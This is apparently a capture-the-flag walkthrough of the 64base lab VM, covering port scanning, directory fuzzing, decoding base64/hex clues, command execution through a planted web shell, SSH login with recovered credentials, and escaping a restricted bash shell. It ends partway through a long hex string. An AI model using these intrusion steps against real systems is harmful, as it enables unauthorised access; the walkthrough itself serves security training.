64Base Walkthrough

In this post, I will show you the walkthrough of 64base, you can download this vm from here, the author is 3mrgnc3.

attack machine 192.168.56.101  
target machine 192.168.56.102  

There are 6 flags in this vm, and the storyline is based on Star Wars.

Use Nmap for port scan:

root@evilc:/home/base64# nmap -T4 192.168.56.102 

Starting Nmap 7.01 ( https://nmap.org ) at 2017-07-14 17:19 EDT  
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers  
Nmap scan report for 192.168.56.102  
Host is up (0.00026s latency).  
Not shown: 997 closed ports  
PORT     STATE SERVICE  
22/tcp   open  ssh  
80/tcp   open  http  
4899/tcp open  radmin  
MAC Address: 08:00:27:68:E7:F8 (Oracle VirtualBox virtual NIC)                                     

Nmap done: 1 IP address (1 host up) scanned in 1.53 seconds  

search google for port 4899, it's a remote admin service, just leave it for a while, check the port 80 first.

Flag 1

Get a website through port 80
wewb check all the posts, get a image, contain some information:
imgag they said, use system instead of exec to run the secret shell.
Well, I'm not sure what is the secret shell, so I just note it.
find a interesting string on index.html
decode it:

root@evilc:/home/base64# echo "dmlldyBzb3VyY2UgO0QK" | base64 -d  
view source ;D  

check the source page, find the first flag, decode it:

<!--5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a-->


root@evilc:/home/base64# echo "5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a" | xxd -r -ps  
ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg==  
root@evilc:/home/base64# echo "5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a" | xxd -r -ps | base64 -d  
flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}  

Now we get the first flag, decode the content for clue:

root@evilc:/home/base64# echo "NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==" | base64 -d  
64base:Th353@r3N0TdaDr01DzU@reL00K1ing4  

well, looks like a username:password for basic.

Flag 2

Use nikto and dirb for more information about this website.
The robots.txt file gives me lots of directories.
dir So I fuzz the website

root@evilc:/home/base64# wfuzz -c -z file,/home/base64/fuzz.txt --hc 200 http://192.168.56.102FUZZ  
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.56.102FUZZ  
Total requests: 429

==================================================================
ID      Response   Lines      Word         Chars          Request  
==================================================================

00000:  C=404      9 L        32 W          292 Ch        "/administrator/"  
00001:  C=404      9 L        32 W          284 Ch        "/login/"  
00002:  C=401     14 L        54 W          461 Ch        "/admin/"  
00073:  C=404      9 L        32 W          284 Ch        "/-HH--/"  
00097:  C=404      9 L        32 W          281 Ch        "/-l/"  
00118:  C=404      9 L        32 W          284 Ch        "/-nn--/"  
00119:  C=404      9 L        32 W          281 Ch        "/-o/"  
00124:  C=404      9 L        32 W          287 Ch        "/office/s/"  
00125:  C=404      9 L        32 W          294 Ch        "/o/-----------/o/"  
00144:  C=404      9 L        32 W          286 Ch        "/oo/----/"  
00156:  C=404      9 L        32 W          295 Ch        "/o88888/888888888/"  
00192:  C=404      9 L        32 W          289 Ch        "/Office/r/s/"  
00194:  C=404      9 L        32 W          287 Ch        "/Office/r/"  
00204:  C=404      9 L        32 W          283 Ch        "/-Row/"  
00307:  C=404      9 L        32 W          293 Ch        "/Imperial-class/"  
00351:  C=404      9 L        32 W          296 Ch        "/thousand/thousand/"  
00395:  C=301      9 L        28 W          313 Ch        "/ZZ"  
00413:  C=404      9 L        32 W          296 Ch        "/XXXXX/XXXXX/XXXXX/"

Total time: 0.676966  
Processed Requests: 429  
Filtered Requests: 411  
Requests/sec.: 633.7089  

Nothing interesting found.
I lost here for a while (about 1 hour).
Then I re-check the post page, find something almost same as the result of wfuzz.
fuzz It's a Imperial-Class, not what we tested in wfuzz (Imperial-class), so I modify the directory, get a place for username and password
use what we get from flag 1, and we get a new website:
The dark side? I chceck the source page:

<!DOCTYPE html>  
<html lang="en">  
<body bgcolor=#000000><font color=#cfbf00>  
<title>64base - login</title>  
<h3>[☠] ERROR: incorrect path!.... TO THE DARK SIDE!</h3>  
<!-- don't forget the BountyHunter login -->  

So there is a BountyHunter directory:
check the source page, find a login.php, go to the login.php page, but get an index.php page:

<body bgcolor=#000000><font color=#cfbf00>  
<form name="login-form" id="login-form" method="post" action="./login.php">  
  <fieldset> 
  <legend>Please login:</legend> 
  <dl> 
    <dt> 
      <label title="Username">Username:
      <input tabindex="1" accesskey="u" name="function" type="text" maxlength="50" id="5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756" /> 
      </label> 
    </dt> 
  </dl> 
  <dl> 
    <dt> 
      <label title="Password">Password:
      <input tabindex="2" accesskey="p" name="command" type="password" maxlength="15" id="584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32" /> 
            </label> 
    </dt> 
  </dl> 
  <dl> 
    <dt> 
      <label title="Submit"> 
      <input tabindex="3" accesskey="l" type="submit" name="cmdlogin" value="Login" /> 
      <!-- basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a -->
      </label> 
    </dt> 
  </dl> 
  </fieldset> 
</form>  

First I thought the basictoken is the flag2, but when I try to decode it, they said the format is wrong:

root@evilc:/home/base64# echo "52714d544a54626d51315a45566157464655614446525557383966516f3d0a" | xxd -r -ps | base64 -d  
F%6VDUFase64: invalid input  

So...it's not a full string for base64. check the source code, find there are two other strings in the same format for id and password. So I combine them together, and decode it

root@evilc:/home/base64# echo "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a" | xxd -ps -r | base64 -d  
flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}  
root@evilc:/home/base64# echo "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=" | base64 -d  
https://www.youtube.com/watch?v=vJwytFWA8uA  

Get the second flag, and a hint, a youtube video.

Flag 3

The video is about star Wars:
with a hint, Burp, that reminds me burp suite.
And there are some comments interesting:
So I use burpsuite check the http data, and get flag 3.:
flag3 decode it, for next clue:

root@evilc:/home/base64# echo "NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=" | base64 -d  
53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id  
Flag 4

The secret shell! And the exec! The note use system replace the exec!
get the flag 4 and decode it:

root@evilc:/home/base64# echo "NjRiYXNlOjY0YmFzZTVoMzc3Cg==" | base64 -d  
64base:64base5h377  

another username and password pair,then I notice the id is 64base, so this might be the username and password for ssh!
But I decide to work on this web shell for a while
I try to use netcat but got a funny cat
cat Then I try to generate reverse shell through php, bash and python, all failed. I notice there is a filter, / and : are not allowed.
but | and wget still work:
wget But I can't wget php reverse shell from my attack machine.
So I just use this web shell check system function:
ps -aux

USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND  
root         1  0.0  0.5   5372  3972 ?        Ss   19:51   0:01 /sbin/init  
root         2  0.0  0.0      0     0 ?        S    19:51   0:00 [kthreadd]  
root         3  0.0  0.0      0     0 ?        S    19:51   0:00 [ksoftirqd/0]  
root         5  0.0  0.0      0     0 ?        S<   19:51   0:00 [kworker/0:0H]  
root         6  0.0  0.0      0     0 ?        S    19:51   0:00 [kworker/u2:0]  
root         7  0.0  0.0      0     0 ?        S    19:51   0:00 [watchdog/0]  
root         8  0.0  0.0      0     0 ?        S<   19:51   0:00 [khelper]  
root         9  0.0  0.0      0     0 ?        S    19:51   0:00 [kdevtmpfs]  
root        10  0.0  0.0      0     0 ?        S<   19:51   0:00 [netns]  
root        11  0.0  0.0      0     0 ?        S    19:51   0:00 [khungtaskd]  
root        12  0.0  0.0      0     0 ?        S<   19:51   0:00 [writeback]  
root        13  0.0  0.0      0     0 ?        SN   19:51   0:00 [ksmd]  
root        14  0.0  0.0      0     0 ?        S<   19:51   0:00 [crypto]  
root        15  0.0  0.0      0     0 ?        S<   19:51   0:00 [kintegrityd]  
root        16  0.0  0.0      0     0 ?        S<   19:51   0:00 [bioset]  
root        17  0.0  0.0      0     0 ?        S<   19:51   0:00 [kblockd]  
root        19  0.0  0.0      0     0 ?        S    19:51   0:00 [kswapd0]  
root        20  0.0  0.0      0     0 ?        S    19:51   0:00 [fsnotify_mark]  
root        26  0.0  0.0      0     0 ?        S<   19:51   0:00 [kthrotld]  
root        27  0.0  0.0      0     0 ?        S<   19:51   0:00 [ipv6_addrconf]  
root        28  0.0  0.0      0     0 ?        S<   19:51   0:00 [deferwq]  
root        62  0.0  0.0      0     0 ?        S    19:51   0:00 [khubd]  
root        63  0.0  0.0      0     0 ?        S<   19:51   0:00 [ata_sff]  
root        64  0.0  0.0      0     0 ?        S<   19:51   0:00 [kpsmoused]  
root        66  0.0  0.0      0     0 ?        S    19:51   0:00 [scsi_eh_0]  
root        67  0.0  0.0      0     0 ?        S<   19:51   0:00 [scsi_tmf_0]  
root        68  0.0  0.0      0     0 ?        S    19:51   0:00 [scsi_eh_1]  
root        69  0.0  0.0      0     0 ?        S    19:51   0:00 [kworker/u2:2]  
root        70  0.0  0.0      0     0 ?        S<   19:51   0:00 [scsi_tmf_1]  
root        71  0.0  0.0      0     0 ?        S    19:51   0:00 [scsi_eh_2]  
root        72  0.0  0.0      0     0 ?        S<   19:51   0:00 [scsi_tmf_2]  
root        78  0.0  0.0      0     0 ?        S<   19:51   0:00 [kworker/0:1H]  
root       100  0.0  0.0      0     0 ?        S    19:51   0:00 [jbd2/sda1-8]  
root       101  0.0  0.0      0     0 ?        S<   19:51   0:00 [ext4-rsv-conver]  
root       133  0.0  0.0      0     0 ?        S    19:51   0:00 [kauditd]  
root       135  0.0  0.4   8284  3464 ?        Ss   19:51   0:00 /lib/systemd/systemd-journald  
root       145  0.0  0.3  12268  3056 ?        Ss   19:51   0:00 /lib/systemd/systemd-udevd  
root       354  0.0  0.6   8108  4880 ?        Ss   19:52   0:00 /usr/sbin/sshd -D  
root       355  0.0  0.3   5012  2784 ?        Ss   19:52   0:00 /usr/sbin/cron -f  
daemon     356  0.0  0.2   2648  1888 ?        Ss   19:52   0:00 /usr/sbin/atd -f  
root       359  0.0  0.3   3528  2480 ?        Ss   19:52   0:00 /lib/systemd/systemd-logind  
message+   362  0.0  0.4   5244  3312 ?        Ss   19:52   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation  
root       426  0.0  0.4  31096  3460 ?        Ssl  19:52   0:00 /usr/sbin/rsyslogd -n  
root       428  0.0  0.2   2196  1604 ?        Ss   19:52   0:00 /usr/sbin/acpid  
root       475  0.0  0.2   4176  1940 tty1     Ss+  19:52   0:00 /sbin/agetty --noclear tty1 linux  
root       649  0.0  0.5   6156  4500 ?        Ss   19:52   0:00 /usr/sbin/apache2 -k start  
www-data   652  0.0  0.4   5924  3204 ?        S    19:52   0:00 /usr/sbin/fcgi-pm -k start  
www-data   653  0.0  0.7 230464  6160 ?        Sl   19:52   0:02 /usr/sbin/apache2 -k start  
www-data   654  0.0  0.8 230912  6876 ?        Sl   19:52   0:02 /usr/sbin/apache2 -k start  
root       655  0.0  0.8   9248  6796 ?        Ss   19:52   0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0  
Debian-+   750  0.0  0.4   9944  3228 ?        Ss   19:52   0:00 /usr/sbin/exim4 -bd -q30m  
root       753  0.0  2.5 107180 19948 ?        Ss   19:52   0:00 php-fpm: master process (/etc/php5/fpm/php-fpm.conf)  
www-data   766  0.0  1.3 107180 10600 ?        S    19:52   0:00 php-fpm: pool www  
www-data   767  0.0  1.3 107180 10048 ?        S    19:52   0:00 php-fpm: pool www  
root      1427  0.0  0.0      0     0 ?        S    20:42   0:00 [kworker/0:0]  
root      1545  0.0  0.0      0     0 ?        S    20:52   0:00 [kworker/0:2]  
root      1609  0.0  0.0      0     0 ?        S    20:57   0:00 [kworker/0:1]  
root      1682  0.0  0.2   2224  1684 ?        S    21:02   0:00 /bin/nc.real -knlp 4899  
root      1683  0.0  0.2   2224  1672 ?        S    21:02   0:00 /bin/nc.real -knlp 22  
www-data  1684  0.0  0.1   2272  1308 ?        S    21:02   0:00 sh -c echo '  
flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}  
';cat.real /etc/issue;date;uname -a;/sbin/ifconfig eth0|/usr/share/grep.real inet;echo  sudo -u 64base hahahah | ps -aux  
root      1690  0.0  0.3   3924  2940 ?        R    21:02   0:00 sudo -u 64base hahahah  
www-data  1691  0.0  0.2   3172  2008 ?        R    21:02   0:00 ps -aux  

w

 21:02:23 up  1:10,  0 users,  load average: 0.00, 0.01, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT  

sudo -l

Matching Defaults entries for www-data on 64base:  
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on 64base:  
    (64base : 64base) NOPASSWD: /usr/bin/id, /bin/ls, /bin/netstat, /usr/bin/who, /usr/bin/whoami, /usr/bin/wget, /bin/ping, /bin/cat, /bin/nc, /usr/bin/w, /usr/bin/base64, /bin/ps, /usr/bin/locate

netstat -antp

Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name  
tcp        0      0 0.0.0.0:62964           0.0.0.0:*               LISTEN      -  
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -  
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -  
tcp        0      0 0.0.0.0:4899            0.0.0.0:*               LISTEN      -  
tcp6       0      0 :::62964                :::*                    LISTEN      -  
tcp6       0      0 ::1:25                  :::*                    LISTEN      -  
tcp6       0      0 :::80                   :::*                    LISTEN      -  
tcp6       0      0 192.168.56.102:80       192.168.56.1:6110       ESTABLISHED -  
tcp6       0      0 192.168.56.102:80       192.168.56.1:6101       TIME_WAIT   -  

Wait, a tcp port on 62964?
what is that?
use Nmap check it.

Flag 5

use Nmap check the 62964 port

root@evilc:/home/base64# nmap 192.168.56.102 -p 62964 -sV

Starting Nmap 7.01 ( https://nmap.org ) at 2017-07-15 16:06 EDT  
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers  
Nmap scan report for 192.168.56.102  
Host is up (0.00042s latency).  
PORT      STATE SERVICE VERSION  
62964/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)  
MAC Address: 08:00:27:68:E7:F8 (Oracle VirtualBox virtual NIC)  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
Nmap done: 1 IP address (1 host up) scanned in 1.08 seconds  

Ok, another SSH port.
However, when I try to connect to port 22, it failed. but port 63964 gives me some responce.
I use username and passowrd got from flag 4 to try, but failed.

I stuck here for about 3 hours. Then I try base64 encode the password, and try again, it successed.

root@evilc:/home/base64# echo "64base5h377" | base64  
NjRiYXNlNWgzNzcK  
root@evilc:/home/base64# ssh 64base@192.168.56.102 -p 62964  
64base@192.168.56.102's password:  
Permission denied, please try again.  
64base@192.168.56.102's password: 

Last login: Sat Jul 15 05:43:54 2017 from 192.168.56.101  
-rbash: mesg: command not found
64base@64base:~$  

But this shell is restricted, I find somethign interesting:

64base@64base:~$ id  
-rbash: id: command not found
64base@64base:~$ ls  
well_done_:D  
64base@64base:~$ cat well+done_:D  
 _           
 \\                                                       
  \\_          _.-._                
   X:\        (_/ \_)         
   \::\       ( ==  )          
    \::\       \== /          
   /X:::\   .-./`-'\.--.       
   \\/\::\ / /     (    l      
    ~\ \::\ /      `.   L.      
      \/:::|         `.'  `     
      /:/\:|         `(    `.    
      \/`-'`.          >    )     
             \       //  .-'     
              |     /(  .'        
              `-..-'_ \  \        
              __||/  \ `-'          
             / _ \ #  |            
            |  #  |#  |           
         LS |  #  |#             

    BioTronics Security Droid 

I try lot's of commands:
python

64base@64base:~$ python  
           &#95;&#95;&#95;&#95;
          / ___\
         |: =O =O
         |:: __ |
          \_/LLL\
    __ __./:__:\.__ __
   (%%i \ |<__>| / i%%)
   |--|:/\/ :: \/\:|--|
   |  |:  :====:  :|  |
  .':.'Y-" |::| "-Y`.:`.
  |__| | : |__|.-.| |__|
  (%%) | : /++\`-'! (%%)
   \  \|n._\++/_.n| /  /
    \ xT::::--::::T/  /
     \Xl-. `""' .-lXX'
       |: \    / :|
       |:  i--i  :|
       |:  |  |  :| LS
       |___|  |__;|
       P%%%Y  P%%%Y
       b%%%d  b%%%d   B4 Bodyguard Droid
       |   |  |   |     - Front View -

ruby

64base@64base:~$ ruby

             &#95;&#95;&#95;&#95;&#95;
         ___/O   O\&#95;&#95;&#95;&#95;
        / O        O   \
        \&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;/
   -===|&#95;&#95;&#95;&#95;\///\\\/&#95;&#95;&#95;&#95;&#95;
       \----------------/
        \&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;/  \/
         /\&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;&#95;/    //
  >=o\  // //\\   || \\  //
     \\o/ //  \o  ||  \o//
         //    || ||
     /o==o     |o \o==o   LS
    //         //     \\
    /\        //       /\   Arakyd Viper Probe Droid
              /\                 - Front View -

perl

64base@64base:~$ perl  
          ,------.._
         (      o  o)
        _.`--------'
      .~  ~.   . `-.-~<del>-.___      &#95;&#95;&#95;&#95;
      (     )   \       \    </del>~~~~ .--'
    .-~    /     ) ..___.-----------~
   /     > `-._  |/
  (      \     <del>--._
   `-.    \   //     </del>--.
      `-.  ~-.\\ /~-._  /X\
         `-=-._:=--. / |XOX|
     LS    |  |     ~-._\X/
         .--.-~~-.
        / ++| xx |   B-BD1 Battle Droid
       / ++/| xx |     - Side View -

more

64base@64base:~$ more well_done_:D  
               .------.
              .'::::::' `.
              |: __   __ |
              | <__] [__>|     
              `-.  __  .-'                       
                | |==| |                      
                | |==| |                     
             __.`-[..]-'\__             
      _.--:""      ||   _``:::--._   
     | |  |.      .:'  (o) ::|  | |       
     |_|  |::..  // _       :|  |_|              
      ===-|:''' // /.\       |-===\       
      |_| `:___//_|[ ]|&#95;&#95;&#95;&#95;&#95;.' |_| )        
      l=l   |\V/_=======_==|   l=l/          
    .-l=l   |`'==/=="======|  /|.:        
    | l l   |=="======\=_==| `-T l      
    `.l_l   |==============|   l_l        
      [_]  [__][__]&#95;&#95;&#95;&#95;[_]__]  [_]     
      \\\ .'.--.- --   --. .`. |||.
      \\\\| |  |    |    |  || |||| 
       \\\\   .'    |    |  |`.||||
        \\\\  | LS  |    `.   |||||

              Medical Droid

finially when I check env, I got something:

64base@64base:~$ env  
TERM=screen  
SHELL=/bin/rbash  
SSH_CLIENT=192.168.56.101 43694 62964  
SSH_TTY=/dev/pts/0  
USER=64base  
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:  
MAIL=/var/mail/64base  
PATH=/var/alt-bin  
PWD=/64base  
LANG=en_GB.UTF-8  
GCC_COLORS=error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01  
SHLVL=1  
HOME=/64base  
LANGUAGE=en_GB:en  
LOGNAME=64base  
SSH_CONNECTION=192.168.56.101 43694 192.168.56.102 62964  
_=/var/alt-bin/env  

The PATH is customed. So I check all the PATH variables:

64base@64base:~$ echo $PATH  
/var/alt-bin
64base@64base:~$ echo $PATH/*  
/var/alt-bin/awk /var/alt-bin/base64 /var/alt-bin/cat /var/alt-bin/droids /var/alt-bin/egrep /var/alt-bin/env /var/alt-bin/fgrep /var/alt-bin/file /var/alt-bin/find /var/alt-bin/grep /var/alt-bin/head /var/alt-bin/less /var/alt-bin/ls /var/alt-bin/more /var/alt-bin/perl /var/alt-bin/python /var/alt-bin/ruby /var/alt-bin/tail

lots of binary files, execute them, when I execute the droids:
droids When I use ctrl+c terminal it.
And I just escape this rbash jail!
check the /var/www/html/ I remember there is a /admin/ directory, which request username and password, and I got flag 5

64base@64base:/var/www/html$ cd admin  
64base@64base:/var/www/html/admin$ ls  
index.php  S3cR37  
64base@64base:/var/www/html/admin$ cd S3cR37/  
64base@64base:/var/www/html/admin/S3cR37$ ls  
flag5{TG9vayBJbnNpZGUhIDpECg==}  
64base@64base:/var/www/html/admin/S3cR37$  

decode it:

64base@64base:/var/www/html/admin/S3cR37$ echo "TG9vayBJbnNpZGUhIDpECg==" | base64 -d  
Look Inside! :D  
64base@64base:/var/www/html/admin/S3cR37$  
Flag 6

it's a image file, with a strange comments:

64base@64base:/var/www/html/admin/S3cR37$ file flag5\{TG9vayBJbnNpZGUhIDpECg\=\=\}  
flag5{TG9vayBJbnNpZGUhIDpECg==}: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "4c5330744c5331435255644a546942535530456755464a4a566b4655525342", baseline, precision 8, 960x720, frames 3  

anyway, I use strings check the file, get a long string:

4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c517051636d396a4c565235634755364944517352553544556c6c5156455645436b52460a5379314a626d5a764f69424252564d744d5449344c554e43517977324d6a46424d7a68425155513052546c475155457a4e6a55335130457a4f44673452446c434d7a553251776f4b625552300a556e684a643267304d464a54546b467a4d697473546c4a49646c4d356557684e4b325668654868564e586c795231424461334a6955566376556d64515543745352307043656a6c57636c52720a646c6c334e67705a59303931575756615457707a4e475a4a55473433526c7035536d64345230686f5533685262336857626a6c7252477433626e4e4e546b5270636e526a62304e50617a6c530a524546484e5756344f58673056453136436a684a624552435558453161546c5a656d6f35646c426d656d56435246706b53586f35524863795a323479553246465a335531656d56734b7a5a490a52303969526a686161444e4e53574e6f6554687a4d5668795254414b61335a4d53306b794e544a74656c64334e47746955334d354b31466856336c6f4d7a52724f45704a566e7031597a46520a51336c69656a56586231553157545532527a5a784d564a6b637a426959315a785446567a5a51704e5533704c617a4e745332465851586c4d574778764e3078756258467856555a4c5347356b0a516b557855326851566c5a704e47497752336c475355785054335a3062585a47596a5172656d68314e6d705056316c49436d73796147524453453554644374705a3264354f57686f4d3270680a52576456626c4e51576e56464e30354b6430525a5954646c553052685a3077784e31684c634774744d6c6c70516c5a7956566834566b31756232494b643168535a6a56435930644c56546b330a65475276636c59795648457261446c4c553278615a5463354f58527956484a475230356c4d4456326545527961576f315658517953324e52654373354f457334533342585441706e645570510a556c424c52326c71627a6b3253455248597a4e4d4e566c7a65453969566d63724c325a714d4546326330746d636d4e574c327834595663725357313562574d7854566870536b316962554e360a62455233436c52425632316863577453526b52355154464956585a30646c4e6c566e46544d533949616d6845647a6c6b4e45747a646e4e71613270326557565256484e7a5a6e4e6b52324e560a4d47684561316833556c647a6332514b4d6d517a5279744f616d3078556a56615445356e556d784f63465a48616d684c517a524263325a59557a4e4b4d486f7964444e4355453035576b39430a54554a6c4f5552344f4870744e58684757546c365633527964677042523342794d454a6f4f45745264323177616c4656597a46685a6e4e78595646594d465649546b7859564446615431644c0a616d63305530457a57454d355a454e4665555a784d464e4a65464671547a6c4d52304e48436a52524e57356a5a6c566f62585a3063586c3164454e7362444a6b5746427a57465a455a54526c0a6230517851327432536b354557544e4c554663725232744f4f5577724f554e516554677252453531626b5a4a6433674b4b3151724b7a64525a7939315546684c6354524e4e6a464a555467770a4d7a52566148565356314d30564846514f57463657444e44527a6c4d65573970516a5a57596b74505a555233546a68686157784d533170436377706d57546c524e6b464e4d584e3562476c360a53444675626e684c5433526155566431636e68715230704353584d324d6e526c6245317259584d356555354e617a4e4d64546478556b6732633364504f584e6b56454a70436974714d4867300a64555261616b706a5a30315965475a694d4863315154593062466c4763303153656b5a714e31686b5a6e6b784f53744e5a54684b525768524f45744f57455233555574456556564d526b39550a63336f4b4d544e575a6b4a4f65466c7a65557731656b6459546e703563566f3053533950547a644e5a575179616a4248656a426e4d6a4670534545764d445a74636e4d795932786b637a5a540a56554a4852585a754f4535705667707955334a494e6e5a46637a5254656d63776544686b5a45643255544278567a463254577455556e557a54336b765a544577526a63304e586845545546550a53314a7353316f32636c6c4954554e34536a4e4a59323530436b56364d45394e57466c6b517a5a4461555976535664305a3252564b32684c65585a7a4e484e4764454e4359327854595764740a5246524b4d6d74615a485530556c4a3357565a574e6d394a546e6f35596e4250646b554b556e677a534656785a6d354c553268796458704e4f56707261556c7264564e6d556e526d615531320a596c52365a6d5a4b56464d30597a513451303831574339535a5559765157464e654774695532524654305a7a53517047646a6c595a476b355532524f6458684853455579527a5249646b706b0a53584279526c5679566c4e7755306b344d48646e636d49794e44567a647a5a6e5647397064466f354d47684b4e47354b4e5746354e304648436c6c7059574531627a63344e7a63765a6e63320a57566f764d6c557a5155526b61564e50516d3072614770574d6b705765484a7665565659596b63315a475a734d32303452335a6d4e7a464b4e6a4a4753484534646d6f4b63557068626c4e720a4f4445334e586f77596d70795746646b5445637a52464e735355707063327851567974355247466d4e316c43566c6c33563149725645457861304d326157564a5154563056544e776269394a0a4d776f324e466f31625842444b3364785a6c52345232646c51334e6e53577335646c4e754d6e41765a5756305a456b7a5a6c46584f46645952564a69524756304d56564d5346427864456c700a4e314e61596d6f3464697451436d5a7553457852646b563353584d72516d59785133424c4d554672576d565654564a4655577443614552704e7a4a49526d4a334d6b6376656e46306153395a0a5a4735786545463562445a4d576e704a5a5646754f48514b4c3064714e477468636b6f78615530355357597a4f57524e4e55396851315a615569395554304a575956493462584a514e315a300a536d39794f57706c53444a305255777764473946635664434d56424c4d48565955416f744c5330744c55564f524342535530456755464a4a566b46555253424c52566b744c5330744c516f3d0a  

decode it:

64base@64base:/tmp$ echo "4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c517051636d396a4c565235634755364944517352553544556c6c5156455645436b52460a5379314a626d5a764f69424252564d744d5449344c554e43517977324d6a46424d7a68425155513052546c475155457a4e6a55335130457a4f44673452446c434d7a553251776f4b625552300a556e684a643267304d464a54546b467a4d697473546c4a49646c4d356557684e4b325668654868564e586c795231424461334a6955566376556d64515543745352307043656a6c57636c52720a646c6c334e67705a59303931575756615457707a4e475a4a55473433526c7035536d64345230686f5533685262336857626a6c7252477433626e4e4e546b5270636e526a62304e50617a6c530a524546484e5756344f58673056453136436a684a624552435558453161546c5a656d6f35646c426d656d56435246706b53586f35524863795a323479553246465a335531656d56734b7a5a490a52303969526a686161444e4e53574e6f6554687a4d5668795254414b61335a4d53306b794e544a74656c64334e47746955334d354b31466856336c6f4d7a52724f45704a566e7031597a46520a51336c69656a56586231553157545532527a5a784d564a6b637a426959315a785446567a5a51704e5533704c617a4e745332465851586c4d574778764e3078756258467856555a4c5347356b0a516b557855326851566c5a704e47497752336c475355785054335a3062585a47596a5172656d68314e6d705056316c49436d73796147524453453554644374705a3264354f57686f4d3270680a52576456626c4e